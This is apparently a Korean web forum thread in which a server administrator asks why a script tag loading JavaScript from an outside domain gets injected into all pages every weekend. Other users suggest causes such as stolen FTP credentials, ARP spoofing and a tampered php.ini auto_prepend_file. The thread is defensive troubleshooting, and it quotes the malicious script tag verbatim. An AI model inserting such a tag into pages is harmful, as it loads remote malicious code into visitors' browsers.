페이지 상단에 <script src=http://lease.whoneymoon.com/style1/mmdeurope/v1ew.js></script> 스크립트가 계속 주말마다 심어지는데 도데체 이유를 알수가 없네요 ㅠ.ㅠ

ganesis016의 이미지

CentOS 5.4 32bit

아파치 : httpd-2.2.8
MySql : mysql-5.0.51
PHP : php-5.2.6

위버전을 설치하여 서버를 운영중에 있는데
주말 토요일 새벽 부터 토요일 오후 까지

<script src=http://lease.whoneymoon.com/style1/mmdeurope/v1ew.js></script>
이 스크립트가 상단에 계속 심어지는데
서버상에 해당 파일을 확인해도 그 내용이 없고
빈 HTML 페이지에도 그 스크립트가 나옵니다.

이런경우는 거의 접해 보지 못해서
도대체 어떤 이유에서 그렇게 동작이 되는지 확인 할 방도가 없어요 ㅠ.ㅠ
그 전 주에 그 부분을 확인하여 서버를 재설치 하고 이전 작업을 했는데도
다시 이번주에 그부분이 발생을 하네요
원천적으로 해결을 하고 싶은 데 방법이 않보네요

고수님들의 도움이 절실히 필요 합니다.
제발좀 도와 주세요 ㅠ.ㅠ

returntoway의 이미지

저는 이런경우에 위와 같은 현상이 있었습니다.

저는 iframe 으로 성인 사이트 를 팝업하는 바이러스였는데;;

디자이너가 서버에 ftp로 접속해서 디자인된 파일을 업로드 한다던지 html 파일을 수정한다든지 하는 업무를 했던적이 있었더랬는데 그 디자이너의 컴퓨터에 바이러스가 걸려 있었습니다. ftp 접속할 때 타고? 들어왔던지 해당 컴퓨터의 접속정보를 빼갔던지;;

여튼 그래서 서버의 접근권한이 있는 디렉토리에 모든 파일의 본문 끝 부분에 iframe 을 심더군요;;

한번 체크해보십시오. 이런 경우는 아닌지..서버에 접근하는 모든 로컬 컴퓨터를 확인해봐야 할겁니다.. 어떤 넘인지 -_-;;

道를 아십니까?

ganesis016의 이미지

해당파일에는 아무것도 없는 html,php 파일에도
브라우저에서 열면 상단에 해당 스크립트가 들어가요
평일에는 괜찮다가 토요일만 되면 이런 현상이 생겨서
미치겠어요
ㅠ.ㅠ 저 좀 살려주세요

returntoway의 이미지

본문에 내용이 있느냐 없느냐는 중요한게 아닌걸로;;

설마 사람이 .. 수작업으로.. 본문보고 스크립트 심는게 아니지 않을까요^^;;

수정권한이 있는 모든 파일은 대상이 될겁니다 -_-;;

道를 아십니까?

champion의 이미지

서버가 바이러스의 피해를 입었군요.
바이러스만 제거하면 될거 같은데요.
물론 바이러스가 어떤 유형인지는 잘 모르겠습니다만 (보면 알겠는지 모르겠지만) 숨어있는 바이러스부터 찾아내여 제거하세요.

완벽한 세상을 위하여!

김정균의 이미지

서버쪽에 아무런 문제가 없다면 arp spoofing을 의심해 볼 수도 있습니다. gateway의 MAC을 확인 하신 후에 시스템에서 arp 명령으로 gateway의 MAC과 동일한지 확인해 보세요. (물론 증상이 나타날때 확인 하는 것이 가장 확실할 겁니다.) 구글에서 arp spoofing으로 검색하시면 증상에 대해서 확인 하는 방법을 쉽게 찾을 수 있습니다.

그 외에는 실제 파일에 없는데 나온다면, php.ini의 auto_prepend_file가 등록이 되어 있을 수도 있습니다. 이 경우에는 system root를 빼앗겼다고 보시면 됩니다.

ganesis016의 이미지

침해센터에 문의하여 서버 점검을 받았지만 서버상에는 문제가 없는것으로
나와 ARP 쪽을 의심하여 확인을 하고 있지만
별 진척이 되지 않고 있어요ㅠ.ㅠ
php.ini의 auto_prepend_file 에는 별 이상한 부분이 없어요
I.D.C 센터에 문의 하여 게이트웨이 부분을 확인하는데 이상이 없다고 하는데
미치겠어요 이렇게 된지 1달에 지나가는데 별 진척이 없어서 다음주에 해당 서버의 IP를
변경 할 예정입니다
많은 정보를 주셔서 감사합니다.
지금도 그런현상이 일어나서 확인을 하는데 다른 이상한 부분을 찾지 못하겠네요 ㅠ.ㅠ

cys9705의 이미지

서버 측에 바이러스가 심어졌을 수 있습니다.
XE 포럼에서는 상당히 자주 본 유형의 악성 코드인듯합니다.

클라이언트 측에서 보는 웹 페이지 자체에 iframe 등의 외부 페이지가 로드 되어 있어
parent에 악성 코드를 심는 등의 경우가 있지만 빈 페이지에도 나타난다니 이 케이스는 패스군요;;

..모든 클라이언트에서 동일한 현상이 나타나는 것이 아니라면,
혹시 사용 중인 클라이언트의 바이러스 감염을 의외로 의심해 볼 수 있지 않을까요?

이 계정은 더이상 사용하지 않고 있습니다.
솔직히 말하면, 흑역사뿐인 계정이니, 이 서명이 붙은 글은 못 본 척 해주시면 좋겠습니다ㅠㅜ..